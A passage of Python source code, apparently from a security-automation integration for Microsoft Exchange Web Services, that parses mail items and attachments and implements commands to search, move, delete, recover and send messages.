if not item.cc_recipients
else [mailbox.email_address for mailbox in item.cc_recipients],
"BCC": None
if not item.bcc_recipients
else [mailbox.email_address for mailbox in item.bcc_recipients],
"To": None
if not item.to_recipients
else [mailbox.email_address for mailbox in item.to_recipients],
"From": item.author.email_address,
"Subject": item.subject,
"Text": item.text_body,
"HTML": item.body,
"HeadersMap": {header.name: header.value for header in item.headers},
}
def parse_item_as_dict(item, email_address=None, camel_case=False, compact_fields=False):
"""
Parses an exchangelib item as a dict
:param item: exchangelib.Item to parse
:param (Optional) email_address: string mailbox
:param (Optional) camel_case: Is camel case
:param (Optional) compact_fields: Is compact fields
:return: Item as a dict
"""
def parse_object_as_dict(obj):
raw_dict = {}
if obj is not None:
for field in obj.FIELDS:
raw_dict[field.name] = getattr(obj, field.name, None)
return raw_dict
def parse_folder_as_json(folder):
raw_dict = parse_object_as_dict(folder)
if "parent_folder_id" in raw_dict:
raw_dict["parent_folder_id"] = parse_folder_as_json(
raw_dict["parent_folder_id"]
)
if "effective_rights" in raw_dict:
raw_dict["effective_rights"] = parse_object_as_dict(
raw_dict["effective_rights"]
)
return raw_dict
raw_dict = {}
for field, value in item._field_vals():
if type(value) in [str, int, float, bool, Body, HTMLBody, None]:
raw_dict[field] = value
raw_dict["id"] = item.id
if getattr(item, "attachments", None):
raw_dict["attachments"] = [
parse_attachment_as_dict(item.id, x) for x in item.attachments
]
for time_field in [
"datetime_sent",
"datetime_created",
"datetime_received",
"last_modified_time",
"reminder_due_by",
]:
value = getattr(item, time_field, None)
if value:
raw_dict[time_field] = value.ewsformat()
for dict_field in [
"effective_rights",
"parent_folder_id",
"conversation_id",
"author",
"extern_id",
"received_by",
"received_representing",
"reply_to",
"sender",
"folder",
]:
value = getattr(item, dict_field, None)
if value:
if isinstance(value, list):
raw_dict[dict_field] = []
for single_val in value:
raw_dict[dict_field].append(parse_object_as_dict(single_val))
else:
raw_dict[dict_field] = parse_object_as_dict(value)
for list_dict_field in ["headers", "cc_recipients", "to_recipients"]:
value = getattr(item, list_dict_field, None)
if value:
raw_dict[list_dict_field] = [parse_object_as_dict(x) for x in value]
if getattr(item, "folder", None):
raw_dict["folder"] = parse_folder_as_json(item.folder)
folder_path = (
item.folder.absolute[len(TOIS_PATH):]
if item.folder.absolute.startswith(TOIS_PATH)
else item.folder.absolute
)
raw_dict["folder_path"] = folder_path
if compact_fields:
new_dict = {}
# noinspection PyListCreation
fields_list = [
"datetime_created",
"datetime_received",
"datetime_sent",
"sender",
"has_attachments",
"importance",
"message_id",
"last_modified_time",
"size",
"subject",
"text_body",
"headers",
"body",
"folder_path",
"is_read",
]
if "id" in raw_dict:
new_dict["itemId"] = raw_dict["id"]
fields_list.append("itemId")
for field in fields_list:
if field in raw_dict:
new_dict[field] = raw_dict.get(field)
for field in ["received_by", "author", "sender"]:
if field in raw_dict:
new_dict[field] = raw_dict.get(field, {}).get("email_address")
for field in ["to_recipients"]:
if field in raw_dict:
new_dict[field] = [x.get("email_address") for x in raw_dict[field]]
attachments = raw_dict.get("attachments")
if attachments and len(attachments) > 0:
file_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == FILE_ATTACHMENT_TYPE
]
if len(file_attachments) > 0:
new_dict["FileAttachments"] = file_attachments
item_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == ITEM_ATTACHMENT_TYPE
]
if len(item_attachments) > 0:
new_dict["ItemAttachments"] = item_attachments
raw_dict = new_dict
if camel_case:
raw_dict = keys_to_camel_case(raw_dict)
if email_address:
raw_dict[MAILBOX] = email_address
return raw_dict
def get_entry_for_file_attachment(item_id, attachment):
"""
Creates a file entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: file entry dict for attachment
"""
entry = fileResult(get_attachment_name(attachment.name), attachment.content)
entry["EntryContext"] = {
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT
+ CONTEXT_UPDATE_FILE_ATTACHMENT: parse_attachment_as_dict(item_id, attachment)
}
return entry
def parse_attachment_as_dict(item_id, attachment):
"""
Parses an attachment into a dict of its fields
:param item_id: item_id of the item containing the attachment
:param attachment: exchangelib attachment
:return: dict of attachment fields
"""
try:
attachment_content = (
attachment.content
if isinstance(attachment, FileAttachment)
else attachment.item.mime_content
)
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": hashlib.sha256(attachment_content).hexdigest()
if attachment_content
else None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
def get_entry_for_item_attachment(item_id, attachment, target_email):
"""
Creates a note entry for an item attachment
:param item_id: Item id
:param attachment: exchangelib attachment
:param target_email: target email
:return: note entry dict for item attachment
"""
item = attachment.item
dict_result = parse_attachment_as_dict(item_id, attachment)
dict_result.update(
parse_item_as_dict(item, target_email, camel_case=True, compact_fields=True)
)
title = f'EWS get attachment got item for "{target_email}", "{get_attachment_name(attachment.name)}"'
return get_entry_for_object(
title,
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT + CONTEXT_UPDATE_ITEM_ATTACHMENT,
dict_result,
)
""" Command Functions """
def get_expanded_group(client: EWSClient, email_address, recursive_expansion=False):
"""
Retrieve expanded group command
:param client: EWS Client
:param email_address: Email address of the group to expand
:param (Optional) recursive_expansion: Whether to enable recursive expansion. Default is "False".
:return: Expanded groups output tuple
"""
group_members = ExpandGroup(protocol=client.protocol).call(
email_address, recursive_expansion
)
group_details = {"name": email_address, "members": group_members}
output = {"EWS.ExpandGroup": group_details}
readable_output = tableToMarkdown("Group Members", group_members)
return readable_output, output, group_details
def get_searchable_mailboxes(client: EWSClient):
"""
Retrieve searchable mailboxes command
:param client: EWS Client
:return: Searchable mailboxes output tuple
"""
searchable_mailboxes = GetSearchableMailboxes(protocol=client.protocol).call()
readable_output = tableToMarkdown(
"Searchable mailboxes", searchable_mailboxes, headers=["displayName", "mailbox"]
)
output = {"EWS.Mailboxes": searchable_mailboxes}
return readable_output, output, searchable_mailboxes
def delete_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Deletes attachments for a given message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids to delete
:return: entries that were deleted
"""
attachments = client.get_attachments_for_item(
item_id, target_mailbox, attachment_ids
)
deleted_file_attachments = []
deleted_item_attachments = [] # type: ignore
for attachment in attachments:
attachment_deleted_action = {
ATTACHMENT_ID: attachment.attachment_id.id,
ACTION: "deleted",
}
if isinstance(attachment, FileAttachment):
deleted_file_attachments.append(attachment_deleted_action)
else:
deleted_item_attachments.append(attachment_deleted_action)
attachment.detach()
entries = []
if len(deleted_file_attachments) > 0:
entry = get_entry_for_object(
"Deleted file attachments",
"EWS.Items" + CONTEXT_UPDATE_FILE_ATTACHMENT,
deleted_file_attachments,
)
entries.append(entry)
if len(deleted_item_attachments) > 0:
entry = get_entry_for_object(
"Deleted item attachments",
"EWS.Items" + CONTEXT_UPDATE_ITEM_ATTACHMENT,
deleted_item_attachments,
)
entries.append(entry)
return entries
def fetch_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Fetches attachments for a message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids
:return: list of parsed entries
"""
account = client.get_account(target_mailbox)
attachments = client.get_attachments_for_item(item_id, account, attachment_ids)
entries = []
for attachment in attachments:
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
entries.append(get_entry_for_file_attachment(item_id, attachment))
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
else:
entries.append(
get_entry_for_item_attachment(
item_id, attachment, account.primary_smtp_address
)
)
if attachment.item.mime_content:
entries.append(
fileResult(
get_attachment_name(attachment.name) + ".eml",
attachment.item.mime_content,
)
)
return entries
def move_item_between_mailboxes(
client: EWSClient,
item_id,
destination_mailbox,
destination_folder_path,
source_mailbox=None,
is_public=None,
):
"""
Moves item between mailboxes
:param client: EWS Client
:param item_id: item id
:param destination_mailbox: destination mailbox
:param destination_folder_path: destination folder path
:param (Optional) source_mailbox: source mailbox
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
source_account = client.get_account(source_mailbox)
destination_account = client.get_account(destination_mailbox)
is_public = client.is_default_folder(destination_folder_path, is_public)
destination_folder = client.get_folder_by_path(
destination_folder_path, destination_account, is_public
)
item = client.get_item_from_mailbox(source_account, item_id)
exported_items = source_account.export([item])
destination_account.upload([(destination_folder, exported_items[0])])
source_account.bulk_delete([item])
move_result = {
MOVED_TO_MAILBOX: destination_mailbox,
MOVED_TO_FOLDER: destination_folder_path,
}
readable_output = "Item was moved successfully."
output = {f"EWS.Items(val.itemId === '{item_id}')": move_result}
return readable_output, output, move_result
def move_item(
client: EWSClient, item_id, target_folder_path, target_mailbox=None, is_public=None
):
"""
Moves an item within the same mailbox
:param client: EWS Client
:param item_id: item id
:param target_folder_path: target folder path
:param (Optional) target_mailbox: mailbox containing the item
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, is_public=is_public)
item = client.get_item_from_mailbox(account, item_id)
if isinstance(item, ErrorInvalidIdMalformed):
raise Exception("Item not found")
item.move(target_folder)
move_result = {
NEW_ITEM_ID: item.id,
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: "moved",
}
readable_output = tableToMarkdown("Moved items", move_result)
output = {CONTEXT_UPDATE_EWS_ITEM: move_result}
return readable_output, output, move_result
def delete_items(client: EWSClient, item_ids, delete_type, target_mailbox=None):
"""
Delete items in a mailbox
:param client: EWS Client
:param item_ids: items ids to delete
:param delete_type: delete type: trash/soft/hard
:param (Optional) target_mailbox: mailbox containing the items
:return: Output tuple
"""
deleted_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
delete_type = delete_type.lower()
for item in items:
item_id = item.id
if delete_type == "trash":
item.move_to_trash()
elif delete_type == "soft":
item.soft_delete()
elif delete_type == "hard":
item.delete()
else:
raise Exception(
f'invalid delete type: {delete_type}. Use "trash" \\ "soft" \\ "hard"'
)
deleted_items.append(
{
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: f"{delete_type}-deleted",
}
)
readable_output = tableToMarkdown(
f"Deleted items ({delete_type} delete type)", deleted_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: deleted_items}
return readable_output, output, deleted_items
def search_items_in_mailbox(
client: EWSClient,
query=None,
message_id=None,
folder_path="",
limit=100,
target_mailbox=None,
is_public=None,
selected_fields="all",
):
"""
Search items in mailbox
:param client: EWS Client
:param (Optional) query: query to execute
:param (Optional) message_id: message ids to search
:param (Optional) folder_path: folder path to search
:param (Optional) limit: max amount of items to fetch
:param (Optional) target_mailbox: mailbox containing the items
:param (Optional) is_public: is the targeted folder public
:param (Optional) selected_fields: Selected fields
:return: Output tuple
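Example (illustrative; the query syntax follows EWS QueryString search):
    readable, outputs, raw = search_items_in_mailbox(
        client, query='subject:invoice', folder_path="Inbox", limit=10
    )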
"""
if not query and not message_id:
return_error("Missing required argument. Provide query or message-id")
if message_id and message_id[0] != "<" and message_id[-1] != ">":
message_id = "<{}>".format(message_id)
account = client.get_account(target_mailbox)
limit = int(limit)
if folder_path.lower() == "inbox":
folders = [account.inbox]
elif folder_path:
is_public = client.is_default_folder(folder_path, is_public)
folders = [client.get_folder_by_path(folder_path, account, is_public)]
else:
folders = account.inbox.parent.walk() # pylint: disable=E1101
items = [] # type: ignore
selected_all_fields = selected_fields == "all"
if selected_all_fields:
restricted_fields = list([x.name for x in Message.FIELDS]) # type: ignore
else:
restricted_fields = set(argToList(selected_fields)) # type: ignore
restricted_fields.update(["id", "message_id"]) # type: ignore
for folder in folders:
if Message not in folder.supported_item_models:
continue
if query:
items_qs = folder.filter(query).only(*restricted_fields)
else:
items_qs = folder.filter(message_id=message_id).only(*restricted_fields)
items += get_limited_number_of_messages_from_qs(items_qs, limit)
if len(items) >= limit:
break
items = items[:limit]
searched_items_result = [
parse_item_as_dict(
item,
account.primary_smtp_address,
camel_case=True,
compact_fields=selected_all_fields,
)
for item in items
]
if not selected_all_fields:
searched_items_result = [
{k: v for (k, v) in i.items() if k in keys_to_camel_case(restricted_fields)}
for i in searched_items_result
]
for item in searched_items_result:
item["itemId"] = item.pop("id", "")
readable_output = tableToMarkdown(
"Searched items",
searched_items_result,
headers=ITEMS_RESULTS_HEADERS if selected_all_fields else None,
)
output = {CONTEXT_UPDATE_EWS_ITEM: searched_items_result}
return readable_output, output, searched_items_result
def get_out_of_office_state(client: EWSClient, target_mailbox=None):
"""
Retrieve the out-of-office state of the targeted mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
oof = account.oof_settings
oof_dict = {
"state": oof.state, # pylint: disable=E1101
"externalAudience": getattr(oof, "external_audience", None),
"start": oof.start.ewsformat() if oof.start else None, # pylint: disable=E1101
"end": oof.end.ewsformat() if oof.end else None, # pylint: disable=E1101
"internalReply": getattr(oof, "internal_replay", None),
"externalReply": getattr(oof, "external_replay", None),
MAILBOX: account.primary_smtp_address,
}
readable_output = tableToMarkdown(
f"Out of office state for {account.primary_smtp_address}", oof_dict
)
output = {f"Account.Email(val.Address == obj.{MAILBOX}).OutOfOffice": oof_dict}
return readable_output, output, oof_dict
def recover_soft_delete_item(
client: EWSClient,
message_ids,
target_folder_path="Inbox",
target_mailbox=None,
is_public=None,
):
"""
Recovers soft deleted items
:param client: EWS Client
:param message_ids: Message ids to recover
:param (Optional) target_folder_path: target folder path
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the target folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, account, is_public)
recovered_messages = []
message_ids = argToList(message_ids)
items_to_recover = account.recoverable_items_deletions.filter( # pylint: disable=E1101
message_id__in=message_ids
).all() # pylint: disable=E1101
recovered_items = set()
for item in items_to_recover:
recovered_items.add(item)
if len(recovered_items) != len(message_ids):
missing_items = set(message_ids).difference(recovered_items)
raise Exception(
f"Some message ids are missing in recoverable items directory: {missing_items}"
)
for item in recovered_items:
item.move(target_folder)
recovered_messages.append(
{ITEM_ID: item.id, MESSAGE_ID: item.message_id, ACTION: "recovered"}
)
readable_output = tableToMarkdown("Recovered messages", recovered_messages)
output = {CONTEXT_UPDATE_EWS_ITEM: recovered_messages}
return readable_output, output, recovered_messages
def get_contacts(client: EWSClient, limit, target_mailbox=None):
"""
Retrieve contacts of the target mailbox or client mailbox
:param client: EWS Client
:param limit: max amount of contacts to retrieve
:param (Optional) target_mailbox: Target mailbox
:return:
"""
def parse_physical_address(address):
result = {}
for attr in ["city", "country", "label", "state", "street", "zipcode"]:
result[attr] = getattr(address, attr, None)
return result
def parse_phone_number(phone_number):
result = {}
for attr in ["label", "phone_number"]:
result[attr] = getattr(phone_number, attr, None)
return result
def parse_contact(contact):
contact_dict = dict(
(k, v if not isinstance(v, EWSDateTime) else v.ewsformat())
for k, v in list(contact._field_vals())
if isinstance(v, str) or isinstance(v, EWSDateTime)
)
if isinstance(contact, Contact) and contact.physical_addresses:
contact_dict["physical_addresses"] = list(
map(parse_physical_address, contact.physical_addresses)
)
if isinstance(contact, Contact) and contact.phone_numbers:
contact_dict["phone_numbers"] = list(
map(parse_phone_number, contact.phone_numbers)
)
if (
isinstance(contact, Contact)
and contact.email_addresses
and len(contact.email_addresses) > 0
):
contact_dict["emailAddresses"] = [x.email for x in contact.email_addresses]
contact_dict = keys_to_camel_case(contact_dict)
contact_dict = dict((k, v) for k, v in list(contact_dict.items()) if v)
contact_dict.pop("mimeContent", None)
contact_dict["originMailbox"] = target_mailbox
return contact_dict
account = client.get_account(target_mailbox)
contacts = []
for contact in account.contacts.all()[: int(limit)]: # pylint: disable=E1101
contacts.append(parse_contact(contact))
readable_output = tableToMarkdown(f"Email contacts for {target_mailbox}", contacts)
output = {"Account.Email(val.Address == obj.originMailbox).EwsContacts": contacts}
return readable_output, output, contacts
def create_folder(client: EWSClient, new_folder_name, folder_path, target_mailbox=None):
"""
Creates a folder in the target mailbox or the client mailbox
:param client: EWS Client
:param new_folder_name: new folder name
:param folder_path: path of the new folder
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
full_path = os.path.join(folder_path, new_folder_name)
try:
if client.get_folder_by_path(full_path, account):
return f"Folder {full_path} already exists",
except Exception:
pass
parent_folder = client.get_folder_by_path(folder_path, account)
f = Folder(parent=parent_folder, name=new_folder_name)
f.save()
client.get_folder_by_path(full_path, account)
return f"Folder {full_path} created successfully",
def find_folders(client: EWSClient, target_mailbox=None):
"""
Finds folders in the mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
root = account.root
if client.is_public_folder:
root = account.public_folders_root
folders = []
for f in root.walk(): # pylint: disable=E1101
folder = folder_to_context_entry(f)
folders.append(folder)
folders_tree = root.tree() # pylint: disable=E1101
readable_output = folders_tree
output = {"EWS.Folders(val.id == obj.id)": folders}
return readable_output, output, folders
def mark_item_as_junk(client: EWSClient, item_id, move_items, target_mailbox=None):
"""
Marks item as junk in the target mailbox or client mailbox
:param client: EWS Client
:param item_id: item ids to mark as junk
:param move_items: "yes" or "no" - to move or not to move to trash
:param (Optional) target_mailbox: target mailbox
:return:
"""
account = client.get_account(target_mailbox)
move_items = move_items.lower() == "yes"
ews_result = MarkAsJunk(account=account).call(item_id=item_id, move_item=move_items)
mark_as_junk_result = {
ITEM_ID: item_id,
}
if ews_result == "Success":
mark_as_junk_result[ACTION] = "marked-as-junk"
else:
raise Exception("Failed mark-item-as-junk with error: " + ews_result)
readable_output = tableToMarkdown("Mark item as junk", mark_as_junk_result)
output = {CONTEXT_UPDATE_EWS_ITEM: mark_as_junk_result}
return readable_output, output, mark_as_junk_result
def get_items_from_folder(
client: EWSClient,
folder_path,
limit=100,
target_mailbox=None,
is_public=None,
get_internal_item="no",
):
"""
Retrieve items from folder path
:param client: EWS Client
:param folder_path: folder path
:param (Optional) limit: max amount of items to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:param (Optional) get_internal_item: should also retrieve internal items ("no" by default)
:return: Output tuple
"""
account = client.get_account(target_mailbox)
limit = int(limit)
get_internal_item = get_internal_item == "yes"
is_public = client.is_default_folder(folder_path, is_public)
folder = client.get_folder_by_path(folder_path, account, is_public)
qs = folder.filter().order_by("-datetime_created")[:limit]
items = get_limited_number_of_messages_from_qs(qs, limit)
items_result = []
for item in items:
item_attachment = parse_item_as_dict(
item, account.primary_smtp_address, camel_case=True, compact_fields=True
)
for attachment in item.attachments:
if (
get_internal_item
and isinstance(attachment, ItemAttachment)
and isinstance(attachment.item, Message)
):
# if an item attachment was found - switch the item to the attachment
item_attachment = parse_item_as_dict(
attachment.item,
account.primary_smtp_address,
camel_case=True,
compact_fields=True,
)
break
items_result.append(item_attachment)
hm_headers = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"itemId",
]
readable_output = tableToMarkdown(
"Items in folder " + folder_path, items_result, headers=hm_headers
)
output = {CONTEXT_UPDATE_EWS_ITEM: items_result}
return readable_output, output, items_result
def get_items(client: EWSClient, item_ids, target_mailbox=None):
"""
Get items from target mailbox or client mailbox
:param client: EWS Client
:param item_ids: item ids to retrieve
:param (Optional) target_mailbox: target mailbox to retrieve items from
:return:
"""
item_ids = argToList(item_ids)
account = client.get_account(target_mailbox)
items = client.get_items_from_mailbox(account, item_ids)
items = [x for x in items if isinstance(x, Message)]
items_as_incidents = [parse_incident_from_item(x) for x in items]
items_to_context = [
parse_item_as_dict(x, account.primary_smtp_address, True, True) for x in items
]
readable_output = tableToMarkdown(
"Get items", items_to_context, ITEMS_RESULTS_HEADERS
)
output = {
CONTEXT_UPDATE_EWS_ITEM: items_to_context,
"Email": [email_ec(item) for item in items],
}
return readable_output, output, items_as_incidents
def get_folder(client: EWSClient, folder_path, target_mailbox=None, is_public=None):
"""
Retrieve a folder from the target mailbox or client mailbox
:param client: EWS Client
:param folder_path: folder path to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(folder_path, is_public)
folder = folder_to_context_entry(
client.get_folder_by_path(folder_path, account=account, is_public=is_public)
)
readable_output = tableToMarkdown(f"Folder {folder_path}", folder)
output = {CONTEXT_UPDATE_FOLDER: folder}
return readable_output, output, folder
def folder_to_context_entry(f):
"""
Create a context entry from a folder response
:param f: folder response
:return: dict context entry
"""
try:
f_entry = {
"name": f.name,
"totalCount": f.total_count,
"id": f.id,
"childrenFolderCount": f.child_folder_count,
"changeKey": f.changekey,
}
if "unread_count" in [x.name for x in Folder.FIELDS]:
f_entry["unreadCount"] = f.unread_count
return f_entry
except AttributeError:
if isinstance(f, dict):
return {
"name": f.get("name"),
"totalCount": f.get("total_count"),
"id": f.get("id"),
"childrenFolderCount": f.get("child_folder_count"),
"changeKey": f.get("changekey"),
"unreadCount": f.get("unread_count"),
}
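# Illustrative example (hypothetical values): a Folder object such as the Inbox is
# flattened into a context entry like
#   {'name': 'Inbox', 'totalCount': 42, 'id': 'AAMk...', 'childrenFolderCount': 0,
#    'changeKey': 'AQAAA...', 'unreadCount': 3}
# while a plain dict (e.g. a cached folder response) takes the AttributeError
# fallback path and is mapped key-by-key instead.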
def mark_item_as_read(
client: EWSClient, item_ids, operation="read", target_mailbox=None
):
"""
Marks item as read
:param client: EWS Client
:param item_ids: items ids to mark as read
:param (Optional) operation: operation to execute
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
marked_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
items = [x for x in items if isinstance(x, Message)]
for item in items:
item.is_read = operation == "read"
item.save()
marked_items.append(
{
ITEM_ID: item.id,
MESSAGE_ID: item.message_id,
ACTION: "marked-as-{}".format(operation),
}
)
readable_output = tableToMarkdown(
f"Marked items ({operation} marked operation)", marked_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: marked_items}
return readable_output, output, marked_items
def random_word_generator(length):
"""Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
Due to security implications, we support only images here.
We might not have Beautiful Soup available, so we just do a regex search.
"""
attachments = []
clean_body = ''
last_index = 0
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image\/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
attachment = {
'data': base64.b64decode(m.group(3)),
'name': f'image{i}'
}
attachment['cid'] = f'{attachment["name"]}@{random_word_generator(8)}.{random_word_generator(8)}'
attachments.append(attachment)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + attachment['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
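# A minimal usage sketch (hypothetical input, not called anywhere in the integration):
# handle_html() rewrites an inline base64 image to a cid: reference and returns the
# decoded bytes as a separate attachment dict.
def _handle_html_example():
    html = '<p>Hi</p><img src="data:image/png;base64,iVBORw0KGgo=">'
    clean_body, attachments = handle_html(html)
    # clean_body == '<p>Hi</p><img src="cid:image0@<random>.<random>">'
    # attachments == [{'data': b'\x89PNG\r\n\x1a\n', 'name': 'image0',
    #                  'cid': 'image0@<random>.<random>'}]
    return clean_body, attachments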
def collect_manual_attachments(manualAttachObj):
"""Collect all manual attachments' data
Args:
manualAttachObj (str): String representation of the manually attached files list.
Returns:
List[Dict]. List of the files data.
"""
manually_attached_objects = argToList(manualAttachObj)
attachments = []
for attachment in manually_attached_objects:
file_res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = file_res['path']
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'data': data,
'cid': ''
})
return attachments
def collect_attachments(attachments_ids, attachments_cids, attachments_names):
"""Collect all attachments' data
Args:
attachments_ids (str): String representation of the files ids list.
attachments_cids (str): String representation of the files content ids list.
attachments_names (str): String representation of the files names list.
Returns:
List[Dict]. List of the files data.
"""
attachments = []
files_ids = argToList(attachments_ids)
files_cids = argToList(attachments_cids)
files_names = argToList(attachments_names)
for index, file_id in enumerate(files_ids):
try:
file_res = demisto.getFilePath(file_id)
path = file_res['path']
if len(files_names) > index and files_names[index]:
filename = files_names[index]
else:
filename = file_res['name']
if len(files_cids) > index and files_cids[index]:
cid = files_cids[index]
else:
cid = ''
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'data': data,
'cid': cid
})
except Exception as e:
demisto.error(f'Invalid entry {file_id} with exception: {e}')
return_error(f'Entry {file_id} is not valid or is not a file entry')
return attachments
def handle_transient_files(transient_files, transient_files_contents, transient_files_cids):
"""Creates the transient attachments data
Args:
transient_files (str): String representation of the transient files names list.
transient_files_contents (str): String representation of the transient files content list.
transient_files_cids (str): String representation of the transient files content ids list.
Returns:
List[Dict]. List of the transient files data.
"""
transient_attachments = []
files_names = argToList(transient_files)
files_contents = argToList(transient_files_contents)
files_cids = argToList(transient_files_cids)
for index in range(len(files_names)):
file_name = files_names[index]
if index >= len(files_contents):
break
file_content = bytes(files_contents[index], UTF_8)
if index >= len(files_cids):
file_cid = ''
else:
file_cid = files_cids[index]
transient_attachments.append({
'name': file_name,
'data': file_content,
'cid': file_cid
})
return transient_attachments
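# Illustrative example (hypothetical values): the three comma-separated argument
# strings are zipped positionally into attachment dicts, with missing cids
# defaulting to an empty string:
#   handle_transient_files("a.txt,b.txt", "hello,world", "cid-a")
#   -> [{'name': 'a.txt', 'data': b'hello', 'cid': 'cid-a'},
#       {'name': 'b.txt', 'data': b'world', 'cid': ''}]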
def handle_template_params(template_params):
"""Translates the template params if they exist from the context
Args:
template_params (str): JSON string that represent the variables names to be replaced and the desired value.
Value can be either real value or context key to fetch the value from.
Returns:
Dict. `variable_name: value_to_use` of the templated parameters.
"""
actual_params = {}
if template_params:
try:
params = json.loads(template_params)
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
except ValueError as e:
return_error('Unable to parse template_params: %s' % (str(e)))
return actual_params
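# Illustrative example (hypothetical values): each templated variable carries either a
# literal "value" or a context "key" that is resolved via demisto.dt():
#   template_params = '{"name": {"value": "John"}, "id": {"key": "incident.id"}}'
#   -> {'name': 'John', 'id': <the value of incident.id taken from the context>}
# The resulting dict is then applied to body/htmlBody via str.format().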
def create_message_object(to, cc, bcc, subject, body, additional_headers):
"""Creates the message object according to the existence of additional custom headers.
"""
if additional_headers:
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body,
**additional_headers
)
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body
)
def create_message(to, subject='', body='', bcc=None, cc=None, html_body=None, attachments=None,
additional_headers=None):
"""Creates the Message object that will be sent.
Args:
to (list): Main recipients.
cc (list): CC recipients.
bcc (list): BCC recipients.
subject (str): Email's subject.
body (str): Email's simple text body.
html_body (str): Email's html body.
attachments (list): Files to be attached to the mail, both inline and as files.
additional_headers (Dict): Custom headers to be added to the message.
Returns:
Message. Message object ready to be sent.
"""
if not html_body:
# This is a simple text message - we cannot have CIDs here
message = create_message_object(to, cc, bcc, subject, body, additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
message.attach(new_attachment)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
message = create_message_object(to, cc, bcc, subject, HTMLBody(html_body), additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
else:
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'),
is_inline=True, content_id=attachment.get('cid'))
message.attach(new_attachment)
return message
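# Illustrative example (hypothetical values): every attachment dict carries 'name',
# 'data' and 'cid'; a non-empty cid makes the attachment inline so it can be referenced
# from the HTML body, while an empty cid yields a regular file attachment:
#   create_message(['user@example.com'], subject='Hi',
#                  html_body='<p>logo:</p><img src="cid:logo@example">',
#                  attachments=[{'name': 'logo.png', 'data': png_bytes, 'cid': 'logo@example'}])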
def add_additional_headers(additional_headers):
"""Adds custom headers to the Message object
Args:
